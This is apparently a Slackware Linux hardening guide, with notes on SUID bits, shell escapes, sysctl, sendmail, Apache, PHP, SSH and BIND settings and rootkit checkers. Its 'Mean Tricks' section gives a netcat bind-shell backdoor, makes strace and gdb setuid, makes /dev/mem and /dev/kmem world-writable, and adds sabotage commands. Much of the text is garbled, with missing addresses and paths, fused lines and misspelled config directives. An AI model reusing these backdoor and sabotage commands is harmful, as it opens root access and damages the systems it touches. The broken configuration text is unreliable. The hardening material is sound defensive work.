    Remove the SUID or SGID bit from the following files:

        chmod u-s /usr/bin/at
        chmod u-s /usr/bin/chage
        chmod u-s /usr/bin/chfn
        chmod u-s /usr/bin/chsh
        chmod u-s /usr/bin/crontab
        chmod u-s /usr/bin/expiry
        chmod u-s /usr/bin/gpasswd
        chmod u-s /usr/bin/lppasswd
        chmod u-s /usr/bin/newgrp
        chmod u-s /usr/bin/rcp
        chmod u-s /usr/bin/rlogin
        chmod u-s /usr/bin/rsh
        chmod u-s /usr/libexec/ssh-keysign

    man chmod

Shell Escapes:
    The following is a list of programs that can escape to a shell. This can
    either be done by directly starting a new shell, executing shell commands
    (which is used to start a shell), or by opening an text editor that can be
    used to start a shell.

    These programs are not a security concern by themselves. However, if they
    are set SUID root or used with sudo, the programs can allow users access to
    a root shell.

        dentonj ALL = (ALL) /usr/bin/less /var/log/messages

    Start a new shell:
        dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
        <contents of /var/log/messages>
    Open an editor that can start a new shell:
        dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
        <contents of /var/log/messages>

    Make sure these are not SUID and owned by root. Also make sure they don't
    end up in /etc/sudoers. This list is not complete.     

        /bin/ed                         /bin/more
        /usr/bin/bzmore                 /usr/bin/crontab -e
        /usr/bin/cscope                 /usr/bin/cu
        /usr/bin/cvs -e                 /usr/bin/cvsbug
        /usr/bin/elm                    /usr/bin/elvis
        /usr/bin/ex                     /usr/bin/flea
        /usr/bin/gccbug                 /usr/bin/gdb
        /usr/bin/less                   /usr/bin/lftp
        /usr/bin/mailto                 /usr/bin/mc
        /usr/bin/mcedit                 /usr/bin/mcview
        /usr/bin/mutt                   /usr/bin/mysql
        /usr/bin/mysqlbug               /usr/bin/nail
        /usr/bin/ncftp                  /usr/bin/newspost
        /usr/bin/nn                     /usr/bin/perlbug
        /usr/bin/pilot                  /usr/bin/pine
        /usr/bin/pg                     /usr/bin/rpcclient
        /usr/bin/sdiff                  /usr/bin/slrn
        /usr/bin/smbclient              /usr/bin/tin
        /usr/bin/trn                    /usr/bin/uupick
        /usr/bin/vim                    /usr/bin/zmore

    A couple of the things that I used to figure out which commands allow shell

    root@darkstar:~ cd /usr/bin && for i in `ls | grep -v "@$"`; do
    > echo "     $i"
    > strings $i | grep -e "VISUAL|EDITOR"
    > done | less
    root@darkstar:~ cd /usr/man/man1 && zgrep -E \
    > "\!.command|execute.command" *

Find and delete dead symlinks:
    find / -type l -print | perl -nle '-e || print'

----[ Network ]----

    # Stop arp spoofing used to sniff switched networks     # Set a static ARP entry for the default gateway     arp -s 00:00:FE:ED:FA:CE

    # Set a static ARP entry for the log host     arp -s 00:00:DE:AD:BE:EF

    The file /etc/rc.d/rc.inet2 check for the existance and then runs     rc.firewall. Create a firewall script and place it here.

----[ Cron ]----

    /usr/sbin/ntpdate && /sbin/hwclock --systohc

    root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate

    /usr/bin/find / -type f -name core -exec /bin/rm -f {} \;     /usr/bin/find /tmp -atime +7 -exec /bin/rm -f {} \;     /usr/bin/find /var/tmp -atime +7 -exec /bin/rm -f {} \;

    root@darkstar:~# chmod 700 /etc/cron.daily/cleanup

    /bin/chmod -R go-rwx /home/dentonj
    /bin/chmod -R go-rwx /root
    /bin/chmod -R o-rwx /var/log
    /bin/rm -f /home/dentonj/dead.letter

    root@darkstar:~# chmod 700 /etc/cron.daily/paranoid

    0 3 * * * /usr/bin/find /home -name .rhosts -o -name .forward -ls

    Cron should mail the results to root.

    root@darkstar:~ crontab -l
    root@darkstar:~ crontab -e

    man crond
    man crontab

    root@darkstar:~ rm /etc/at.deny
    root@darkstar:~ touch /etc/at.allow

    Don't allow anyone to use at.

    Even better, remove at from the system:

    root@darkstar:~# removepkg at

    man at

----[ Bash ]----

    Set the history file so that it can only be appended and not erased by a     user.

    root@darkstar:~ chattr +a /home/dentonj/.bash_history
    root@darkstar:~ chmod go-wrx /usr/bin/chattr /usr/bin/lsattr

    man chattr
    man lsattr
    man chmod

    trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0

----[ Kernel ]----

    # Improve file system performance
    vm.bdflush = 60 64 64 256 500 300 80 0 0

    # Increase swap bandwidth system performance
    vm.kswapd = 512 32 32

    # Enables/Disables memory over commitment
    vm.overcommit_memory = 0

    # Increases number of page tables keeps in a per-processor cache
    vm.pagetable_cache = 25 50

    # Increase limit of file-handles
    fs.file-max = 8192

    # Enable/Disable ignoring ping request
    net.ipv4.icmp_echo_ignore_all = 1

    # Enable/Disable ignoring broadcasts request
    net.ipv4.icmp_ignore_broadcasts = 1

    # Enable/Disable IP source routing
    net.ipv4.conf.all.accept_source_route = 0
    net.ipv4.conf.default.accept_source_route = 0

    # Enable/Disable TCP SYN cookie protection
    net.ipv4.tcp_syncookies = 1

    # Enable/Disable ICMP redirect acceptance
    net.ipv4.conf.all.accept_redirects = 0
    net.ipv4.conf.default.accept_redirects = 0

    # Enable/Disable bad error message protection
    net.ipv4.icmp_ignore_bogus_error_responses = 1

    # Enable/Disable IP spoofing protection
    net.ipv4.conf.all.rp_filter = 2
    net.ipv4.conf.default.rp_filter = 2

    # Enable/Disable log spoofed, source routed, redirect packets
    net.ipv4.conf.all.log_martians = 1
    net.ipv4.conf.default.log_martions = 1

    # Improve shared memory size
    kernel.shmall = 134217728
    kernel.shmmax = 134217728

    # Improve default and maximum window sizes
    net.core.vmem_max = 2048000
    net.core.vmem_default = 204800

    # Enable packet forwarding
    net.ipv4.ip_forward = 0

    # Change the default TTL to help obscure OS fingerprinting
    net.ipv4.ip_default_ttl = 128

    root@darkstar:~ sysctl -p /etc/sysctl.conf
    root@darkstar:~ sysctl -A

    These is already an entry in /etc/rc.d/rc.S that will set the
    sysctl settings located in this file during bootup.

    man sysctl
    man sysctl.conf     

    List the kernel modules that are loaded during bootup. Comment out the
    ones you feel are unnecessary.

    root@darkstar:~ grep -v "^\|^$" /etc/rc.d/rc.modules



Remove support for kernel modules:
    From Phrack 25-5, "Unix Cracking Tips":         "After you gain superuser privileges and you wish to stay root,         here are a few suggestions for installing backdoors:         . . .         - Install new system calls         . . ."

    Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your
    kernel to remove supports for modules.


----[ Misc Stuff ]----

    set bell-style none
    set mark-directories on
    set mark-modified-lines on
    set match-hidden-files on
    set show-all-if-ambiguous on
    set visible-stats on

    man bash
    man readline

Stuff to remove:
    root@darkstar:~ removepkg nn
    root@darkstar:~ removepkg slrn
    root@darkstar:~ removepkg uucp
    root@darkstar:~ removepkg strace
    root@darkstar:~ removepkg gdb
    root@darkstar:~ removepkg nc
    root@darkstar:~ removepkg nmap
    root@darkstar:~ removepkg at

    This list should be much longer.

    # This is hard drive specific, your settings will vary     /usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb

    # Turn on NumLock
    /usr/bin/setleds -D +num

Make a backup of commonly trojaned commands:
    Only do this after a fresh install. Making copies of already trojaned
    commands will just ruin your day. If you don't have a fresh install, copy
    the commands from the "Live" CD that comes with the official version of

    root@darkstar:~# mkdir bin
    Copy the following to /root/bin:         /bin/date                     /bin/du         /bin/echo                     /bin/grep         /bin/kill                     /bin/killall         /bin/login                     /bin/ls         /bin/netstat                    /bin/ps         /bin/su                         /bin/tar         /sbin/agetty                    /sbin/explodepkg         /sbin/getty                     /sbin/ifconfig         /sbin/installpkg                /sbin/makepkg         /sbin/pidof                     /sbin/removepkg         /sbin/upgradepkg                /usr/bin/basename         /usr/bin/biff                 /usr/bin/chfn         /usr/bin/chsh                 /usr/bin/crontab         /usr/bin/dirname                /usr/bin/env         /usr/bin/find                 /usr/bin/lsattr         /usr/bin/nail                 /usr/bin/passwd         /usr/bin/pstree                 /usr/bin/ssh         /usr/bin/top                    /usr/bin/traceroute         /usr/bin/write                 /usr/sbin/gpm         /usr/sbin/hdparm                /usr/sbin/in.fingerd         /usr/sbin/in.identd             /usr/sbin/in.rlogind         /usr/sbin/in.rshd             /usr/sbin/in.telnetd         /usr/sbin/in.timed             /usr/sbin/inetd         /usr/sbin/ipop3d                /usr/sbin/named         /usr/sbin/rpcinfo             /usr/sbin/sendmail         /usr/sbin/sshd                 /usr/sbin/syslogd         /usr/sbin/tcpd

    root@darkstar:~ cd bin
    root@darkstar:~/bin md5sum * >> md5sum
    root@darkstar:~/bin cd
    root@darkstar:~ tar zcvf bin.tar.gz ./bin
    root@darkstar:~# cp bin.tar.gz /mnt/thumb

    It would be a good idea to run `chattr +i ...` on all of the original files.

Passwords in logs and history files:
    It's not uncommon for someone to make a mistake while logging in or 
    switching users and type the password in the wrong place.  Be aware that 
    "dumpster diving" in system logs and other users history files is a common 
    practice by evil doers to obtain passwords.  Keep this in mind when 
    deciding to store 6 months worth of logs or when setting HISTFILESIZE to a 
    root@darkstar:~# lastb
    P@ssw0rd1!                             Fri Jun 23 19:04 - 19:04  (00:00)    
    dentonj                                Fri Jun 23 19:03 - 19:03  (00:00)    

    root@darkstar:~# less /home/dentonj/.bash_history     <contents of .bash_history>
    /us                                 <-- type this to search for "us"     . . .
    us -
    . . .

    Ignore the robots.txt file on web servers.
    robots = off

----[ Program Hardening ]----








    man afpd
    man afpd.conf
    man AppleVolumes.default
    man atalkd
    man atalkd.conf
    man netatalk.conf
    man papd



      acl "allowed" {

      acl "denied" {

      key "rndc-key" {
              algorithm hmac-md5;
              secret "Thisisafakekey==";
      controls {
              inet port 953
                   allow {; } keys { "rndc-key"; };
      options {
              directory "/var/named";
              allow-transfer { none; };
              allow-query { allowed; };
              allow-recursion { allowed; };
              blackhole { denied; };
              tcp-clients 32;
              forwarders {;; };
              version "Not available";

      logging {
              category lame-servers { null; };

      zone "." IN {
              type hint;
              file "caching-example/";

      zone "localhost" IN {
              type master;
              file "caching-example/named.local";
              allow-update { none; };
              notify no;

      zone "" IN {
              type master;
              file "caching-example/named.local";
              allow-update { none; };
              notify no;
      key "rndc-key" {
              algorithm hmac-md5;
              secret "Thisisafakekey==";

      options {
              default-key "rndc-key";
              default-port 953;

    To generate the keys for rndc:

    root@darkstar:~# rndc-confgen -b 512
    To check the configuration:

    root@darkstar:~ named-checkconf -z
    zone localhost/IN: loaded serial 42
    zone loaded serial 1997022700
    root@darkstar:~ named-checkzone localhost \
    zone localhost/IN: loaded serial 42
    root@darkstar:~# named-checkzone \
    zone loaded serial 1997022700
    root@darkstar:~# named-checkzone . /var/named/caching-example/
    zone ./IN: has 0 SOA records

    root@darkstar:~ chmod 700 /etc/rc.d/rc.bind
    root@darkstar:~ /etc/rc.d/rc.bind start
    root@darkstar:~# rndc status

    man named
    man named-checkconf
    man named-checkzone
    man rndc
    man rndc.conf
    man rndc-confgen
    man lwresd

    TODO - Chroot



        #O DontBlameSendmail=Safe
        O MaxHopCount=25
        O HelpFile=/etc/
        O ForwardPath=/etc/forward
        O LogLevel=15
        #O DaemonPortOptions=Name=MTA
        #O DaemonPortOptions=Port=587,Name=MSA,M=E
        O DaemonPortOptions=Address=
        O ClientPortOptions=Family=inet,Address=
        O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun,
        O Timeout.ident=0  
        O SmtpGreetingMessage=$j Unauthorized Access Prohibited.
        O AllowBogusHELO=False
        O UnsafeGroupWrites=True
        O RrtImpliesDSN=False
        $.by $j with id $i$?{tls_version}

    root@darkstar:~# touch /etc/forward


        The .forward file allows users to easily forward email.  However, the 
        file can also be used to run a program every time an email is received.
        There are several ways to disable use of the .forward file.
        Set the ForwardPath option so that it points to something other than 
        the default.  The option has to be set to something, otherwise sendmail
        sets ForwardPath to $HOME/.forward.
            O ForwardPath=/etc/forward
        You can allow programs to be run, but restrict which ones can be run by
        using smrsh.
        You can disable forwarding in sendmail all together.  However, the bat 
        book warns that Bad Things(TM) can happen is you completely disable 
        forwarding.  Remove the "w" flag from the line located in 
        Mlocal,         P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=.....
        Mlocal,         P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=.....
        You can try to have root create and own the .forward file in each of 
        the user's home directories.  But the user can move the .forward file 
        and create a new file.
        root@darkstar:~# touch /home/dentonj/.forward
        dentonj@darkstar:~$ ls -l .forward
        -rw-r--r--  1 root root 0 2001-06-27 20:17 .forward
        dentonj@darkstar:~$ mv .forward .forward.moved
        dentonj@darkstar:~$ ls -l .forward.moved
        -rw-r--r--  1 root root 0 2001-06-27 20:17 .forward.moved
        However, making the file immutable stops this.
        root@darkstar:~ touch /home/dentonj/.forward
        root@darkstar:~ chattr +i /home/dentonj/.forward
        root@darkstar:~ lsattr /home/dentonj/.forward 
        ----i-------- /home/dentonj/.forward
        root@darkstar:~ chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
        dentonj@darkstar:~$ ls -l .forward
        -rw-r--r--  1 root root 0 2001-06-27 20:19 .forward
        dentonj@darkstar:~$ mv .forward .forward.moved
        mv: cannot move `.forward' to `.forward.moved': Operation not permitted




        I use to comment out most of these.  Now I'm more interested if someone
        actually tries to send email to any of them.
        postmaster:     root, dentonj
        bin:            root, dentonj
        daemon:         root, dentonj
        games:          root, dentonj
        ingres:         root, dentonj
        nobody:         root, dentonj
        system:         root, dentonj
        toor:           root, dentonj
        uucp:           root, dentonj
        manager:        root, dentonj
        dumper:         root, dentonj
        webmaster:      root, dentonj
        abuse:          root, dentonj
        decode:         root, dentonj
        Add any additional system account present in /etc/passwd:
        admin:          root, dentonj
        ftp:            root, dentonj
        mail:           root, dentonj
        mysql:          root, dentonj
        smmsp:          root, dentonj
        sshd:           root, dentonj
        root@darkstar:~# newaliases
        man aliases
        man newaliases

    If you only need to run sendmail for local mail, use cron.

    root@darkstar:~ /etc/rc.d/rc.sendmail stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.sendmail

        /usr/sbin/sendmail -q

    root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue

    man crond


    root@darkstar:~ groupadd -g 80 http     root@darkstar:~ useradd -u 80 -g 80 http


        #LoadModule includes_module     libexec/apache/
        #LoadModule autoindex_module    libexec/apache/
        #LoadModule speling_module      libexec/apache/
        #LoadModule userdir_module      libexec/apache/
        #LoadModule anon_auth_module    libexec/apache/
        #LoadModule digest_module       libexec/apache/
        #LoadModule proxy_module        libexec/apache/
        #LoadModule cern_meta_module    libexec/apache/
        #LoadModule usertrack_module    libexec/apache/
        #LoadModule unique_id_module    libexec/apache/
        #AddModule mod_includes.c
        #AddModule mod_autoindex.c
        #AddModule mod_speling.c
        #AddModule mod_userdir.c
        #AddModule mod_auth_anon.c
        #AddModule mod_digest.c
        #AddModule mod_proxy.c
        #AddModule mod_cern_meta.c
        #AddModule mod_usertrack.c
        #AddModule mod_unique_id.c
        User http
        Group http
        ServerAdmin root@localhost
        <Directory "/var/www/htdocs">
            Options FollowSymLinks MultiViews
        UseCanonicalName Off    
        LogLevel info
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"
        CustomLog /var/log/apache/access_log combined
        ServerSignature Off
        ServerTokens ProductOnly
        <Directory "/var/www/icons">
            Options MultiViews
        #Alias /manual/ "/var/www/htdocs/manual/"
        #<Directory "/var/www/htdocs/manual">
        #    Options Indexes FollowSymLinks MultiViews
        #    AllowOverride None
        #    Order allow,deny
        #    ALlow from all
        #ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
        #<Directory "/var/www/cgi-bin">
        #    AllowOverride None
        #    Options None
        #    Order allow,deny
        #    Allow from all
        /var/log/apache/access_log /var/log/apache/error_log {
                create 0640 root root
                        /bin/kill -HUP `cat /var/run/ \
                        2> /dev/null || true`

    dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html


    Fortunately, PHP is disabled by default. But if you insist on letting the
    script kiddies have free reign of your system, there are a few things you
    can do to slow them down.

        Include /etc/apache/mod_php.conf

        display_errors = Off
        log_errors = On
        error_log = /var/log/apache/php_errors
        register_globals = Off
        variables_order = "ES"
        expose_php = Off
        all_url_fopen = Off
        open_basdir = /var/www
        disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace
        safe_mode = On
        safe_mode_include_dir = /usr/php/include
        safe_mode_exec_dir = /usr/php/bin
        safe_mode_gid = On
        safe_mode_allowed_env_vars = PHP_
        safe_mode_protected_env_vars = LD_LIBRARY_PATH

    root@darkstar:~ touch /var/log/apache/php_errors
    root@darkstar:~ mkdir -p /usr/php/include
    root@darkstar:~# mkdir /usr/php/bin

    man httpd
    man php

    # Host *
    ForwardAgent no
    ForwardX11 no
    RhostsRSAAuthentication no
    RSAAuthentication no
    PasswordAuthentication yes
    HostbasedAuthentication no
    BatchMode no
    CheckHostIP yes
    AddressFamily any
    ConnectTimeout 0
    StrictHostKeyChecking ask
    # IdentityFile ~/.ssh/identity
    IdentityFile ~/.ssh/id_rsa
    IdentityFile ~/.ssh/id_dsa
    Port 22
    Protocol 2
    # Cipher 3des
    # Ciphers aes256-cbc,aes256-ctr
    EscapeChar ~
    Compression yes
    HashKnownHosts yes
    EnableSSHKeysign no
    LogLevel DEBUG
    PubkeyAuthenticaton yes
    ServerAliveInterval 60
    ServerAliveCountMax 10
    TCPKeepAlive no
    UserKnownHostsFile ~/.ssh/known_hosts     

    Port 22
    Protocol 2
    AddressFamily inet

    # HostKey for protocol version 1
    #HostKey /etc/ssh/ssh_host_key
    # HostKeys for protocol version 2
    HostKey /etc/ssh/ssh_host_rsa_key
    HostKey /etc/ssh/ssh_host_dsa_key

    # Lifetime and size of ephemeral version 1 server key
    #KeyRegenerationInterval 1h
    #ServerKeyBits 768

    # Logging
    # obsoletes QuietMode and FascistLogging     SyslogFacility AUTH
    LogLevel DEBUG

    # Authentication:

    LoginGraceTime 2m
    PermitRootLogin no
    StrictModes yes
    MaxAuthTries 6

    AllowUsers dentonj@trustedhost
    AllowGroups wheel

    RSAAuthentication no
    PubkeyAuthentication yes
    AuthorizedKeysFile     .ssh/authorized_keys

    # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
    RhostsRSAAuthentication no
    # similar for protocol version 2
    HostbasedAuthentication no
    # Change to yes if you don't trust ~/.ssh/known_hosts for     # RhostsRSAAuthentication and HostbasedAuthentication     IgnoreUserKnownHosts no
    # Don't read the user's ~/.rhosts and ~/.shosts files     IgnoreRhosts yes

    # To disable tunneled clear text passwords, change to no here!     PasswordAuthentication no
    PermitEmptyPasswords no

    # Change to no to disable s/key passwords
    #ChallengeResponseAuthentication yes

    # Kerberos options
    #KerberosAuthentication no
    #KerberosOrLocalPasswd yes
    #KerberosTicketCleanup yes
    #KerberosGetAFSToken no

    # GSSAPI options
    #GSSAPIAuthentication no
    #GSSAPICleanupCredentials yes

    #UsePAM no

    AllowTcpForwarding yes
    GatewayPorts no
    X11Forwarding no
    X11DisplayOffset 10
    X11UseLocalhost yes
    PrintMotd yes
    PrintLastLog yes
    TCPKeepAlive no
    UseLogin no
    UsePrivilegeSeparation yes
    PermitUserEnvironment no
    Compression delayed
    ClientAliveInterval 60
    ClientAliveCountMax 10
    UseDNS yes
    PidFile /var/run/
    #MaxStartups 10

    # no default banner path
    Banner /etc/

    # override default of no subsystems
    #Subsystem     sftp    /usr/libexec/sftp-server

    # Ciphers aes256-cbc,aes256-ctr     

    # login.conf(5) is not used in Slackware
    ChallengeResponseAuthentication no     

    root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign     

    man ssh
    man sshd
    man ssh_config
    man sshd_config



    root@darkstar:~# less /var/lib/mysql/darkstar.err

    man mysql_fix_privilege_tables


    root@darkstar:~# removepkg nfs-utils


    root@darkstar:~# removepkg yptools

----[ Security Programs/Scripts ]----


    On the Slackware Source CD 3:

    mount /mnt/cdrom
    cd /mnt/cdrom/testing/packages
    installpkg gnupg-1.4.2-i486-1.tgz

libsafe     On the Slackware Source CD 3:
    mount /mnt/cdrom
    cd /mnt/cdrom/extra/libsafe-2.0.16
    installpkg libsafe-2.0.16-i386-1.tgz



sXid<     root@darkstar:~ cp sxid_4.0.5.tar.gz src
    root@darkstar:~ cd src
    root@darkstar:~/src gzip -cd sxid_4.0.5.tar.gz | tar xvf -
    root@darkstar:~/src cd sxid-4.0.5
    root@darkstar:~/src/sxid-4.0.5 less README
    root@darkstar:~/src/sxid-4.0.5 make install


        ALWAYS_NOTIFY = "yes"
        ALWAYS_ROTATE = "yes"
        IGNORE_DIRS = ""



    root@darkstar:~ chmod 700 /etc/cron.daily/sxid     root@darkstar:~ sxid


    root@darkstar:~ cp chkrootkit_0.46a.tar.gz src/
    root@darkstar:~ cd src
    root@darkstar:~/src gzip -cd chkrootkit_0.46a.tar.gz | tar xvf -
    root@darkstar:~/src cd chkrootkit-0.46a
    root@darkstar:~/src/chkrootkit-0.46a less README
    root@darkstar:~/src/chkrootkit-0.46a make sense

  Copy the following to /usr/local/sbin:
 root@darkstar:~# crontab -e
        # Chkrootkit, results are mailed to root
        10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1)
 root@darkstar:~# killall -HUP crond



    root@darkstar:~ cp lcap_0.0.6.orig.tar.gz src/
    root@darkstar:~ cd src
    root@darkstar:~/src gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf -
    root@darkstar:~/src/ cd lcap-0.0.6/
    root@darkstar:~/src/lcap-0.0.6 less README
    root@darkstar:~/src/lcap-0.0.6 make
    root@darkstar:~/src/lcap-0.0.6 strip lcap
    root@darkstar:~/src/lcap-0.0.6 cp lcap /usr/local/sbin

----[ Usibility/Reducing Security ]----

Run X applications as root:
    The Linux Security Cookbook contains a short script that will set DISPLAY
    and XAUTHORITY to allow root to run X apps. Or you can cheat by setting
    DISPLAY and HOME to accomplish the same thing.

    root@darkstar:~ xv
    xv: Can't open display
    root@darkstar:~ DISPLAY=:0.0
    root@darkstar:~ xv
    Xlib: connection to ":0.0" refused by server
    Xlib: Invalid MIT-MAGIC-COOKIE-1 key
    xv: Can't open display
    root@darkstar:~ HOME=/home/dentonj
    root@darkstar:~# xv
    A better way is to use xauth and set the MIT-MAGIC-COOKIE:
    root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \
        xauth merge -
    root@darkstar:~# xauth list
    darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
    dentonj@darkstar:~$ xauth list
    darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
    localhost:0 MIT-MAGIC-COOKIE-1 9876543219fedcba9876543210fedcba

    You still have to set DISPLAY for root. Be aware that setting DISPLAY in a
    shell config file (e.g. - /etc/profile) may cause problems with X
    forwarding in ssh.

    man xauth
    man Xsecurity

    I like to dig around inside of binaries. Uncomment the following lines:

    *) FILE=`file -L "$1"` ; # Check to see if binary, if so -- view with 'strings'
    FILE1=`echo $FILE | cut -d ' ' -f 2`
    FILE2=`echo $FILE | cut -d ' ' -f 3`
    if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \
         -o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then
     strings "$1"
    fi ;;

Error Beep:
I make extensive use of tab completion in bash. However, the error beeps
tend to annoy those around me. Here are three ways to turn off the error

     setterm -bfreq 0

     xset -b      exec /usr/X11R6/bin/startfluxbox

     set bell-style none

man bash
----[ Mean Tricks ]----

    opensaysme:         | nc -l -p 44444 -e /bin/sh

    | nc -l -p 44444 -e /bin/sh

    NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6

    touch /etc/forcefsck



iptables -m random

iptables -A FORWORD -s -m random --average 90 -j DROP

iptables -A INPUT -j DROP

Anywhere in /etc/rc.d:

enable -n enable    

chmod u+s /usr/bin/strace

chmod u+s /usr/bin/gdb

chmod 666 /dev/mem

chmod 666 /dev/kmem

chmod 666 /dev/port

ifconfig eth0 mtu 68

touch ./-r

----[ Useful Commands ]----

ldd /usr/bin/lppasswd
/lib/ --list /usr/bin/lppasswd

strings /usr/bin/lppasswd

List some of the popular REM commands used.

man -k cron

grep crond /var/log/packages/*

cd /bin && for i in `ls | grep -v "@$"`; do
    file $i | grep "not stripped"

for i in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin;
do echo $i; cd $i && for j in `ls | grep "@$"`; do file $j \
| grep "not stripped"; done; done

which kill
type -a kill

stat /bin/login
touch example
stat example
touch -r /bin/login example
stat example

strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \
    -e read=6 # Where 19148 is the PID of sshd

ifconfig eth0 hw ether 00:00:DE:AD:BE:EF
ifconfig eth0 up -arp

ln -s /usr/bin/write /bin/write
kibitz dentonj

----[ /etc/profile ]----

# If the following variables are not set, exit with an error message
: ${USER:?Who are you?}
: ${LOGNAME:?Who are you?}
: ${HOME:?The homeless need help}

# If a user doesn't have a home directory listed in /etc/passwd,
# login is nice enough to set "/" as $HOME
if [ ${HOME} = "/" ]; then

# Kick and lockout users that are UID 0 but are not root
if [ `id -u` = "0" -a `echo $USER` != "root" ]; then
    # Lock the user out
    passwd -l $USER

    # Save some info
    date >> /root/SHIT
    netstat -peanut >> /root/SHIT
    ps auxww >> /root/SHIT
    w >> /root/SHIT

    w | mail -s "$USER has gained ROOT access on $HOSTNAME"

    # Let EVERYONE know     wall << EOF
         $USER has gained ROOT access on $HOSTNAME!!!

    for i in `ls /dev/pts/`; do
      echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> /dev/pts/$i

    # Log it
    logger -is -f /var/log/messages "$USER has gained ROOT access!!"

    # Let the luzer know
    echo -e "\a\n\n You are NOT root!!\n\n\a"

    # For the really paranoid (run before killing the user's processes)     ifconfig eth0 down

    # Kill the user and their processes
    skill -9 -u $USER

    # This should be redundant

export LESSOPEN="|/usr/bin/ %s"

# Set a default shell prompt:
#if [ "$SHELL" = "/bin/pdksh" ]; then
# PS1='! $ '
elif [ "$SHELL" = "/bin/ksh" ]; then
PS1='! ${PWD/#$HOME/~}$ '
#elif [ "$SHELL" = "/bin/zsh" ]; then
PS1='%n@%m:%~% '
#elif [ "$SHELL" = "/bin/ash" ]; then
# PS1='$ '
# PS1=/\u@\h:\w\$ '

if [ `id -u` = 0 ]; then
  A red shell prompt for root
  PS1="\[\033[1;31m\][\j][\u@\h:\w]\[\033[0m\] "
  # A green shell prompt for everyone else
  PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] "

# For non-root users, add the current directory to the search path: if [ ! "`id -u`" = "0" ]; then

# Stuff I've added

# Add $HOME/bin to the search path
export PATH

export FIGNORE=".o"

# Set EDITOR for less
export EDITOR=vim

# History
# I use to set these to paranoid settings, such as 100 or 10.
export HISTSIZE=10000
export HISTFILESIZE=10000

# Display timestamp information with each history entry

# Logout if a root terminal is not being used
if [ `id -u` = "0" ]; then
    export TMOUT=1200

# Aliases
alias matrix="cmatrix -bass"
alias m="cmatrix -bass"
alias su="su -"
alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump"

# shred doesn't delete recursively
# use "/bin/rf -rf ..." for directories
alias rm="shred -uz"

# Disable the bash builtin command kill, forces the use # of /bin/kill.
# This was a cute idea, but it prevents jobs from being killed #enable -n kill

# Misc shell settings
shopt -s cdspell
shopt -s cmdhist
shopt -s dotglob
shopt -s extglob
setterm -bfreq 0

# grep options
export GREP_OPTIONS="-n --color"
export GREP_COLOR="1;33"

# Secure less

# This works for single user systems if the luzer who breaks into your # system uses an interactive shell
if [ `id -u` != "0" -o `id -u` != "1000" ]; then
    passwd -l $USER

# Set these and make them read only to keep users from setting them export HISTCONTROL=""
export HISTIGNORE=""

#Disable builtin shell commands

# Set shell variables as read only, this should be last: typeset -r HISTCONTROL
typeset -r HISTFILE
typeset -r HISTIGNORE
typeset -r HISTNAME
typeset -r HISTSIZE
typeset -r LESSSECURE
typeset -r LOGNAME
typeset -r USER

-- When You Are Done --

Join the irc channel #slackware on and talk about everything but Slackware.

-- Todo --

    Look into it


    Lock down the other shells.


    Modify so a different encryption hashing algorithms is used.

Securing filesystems other than ext2 and ext3

Log checking utility

-- Resources --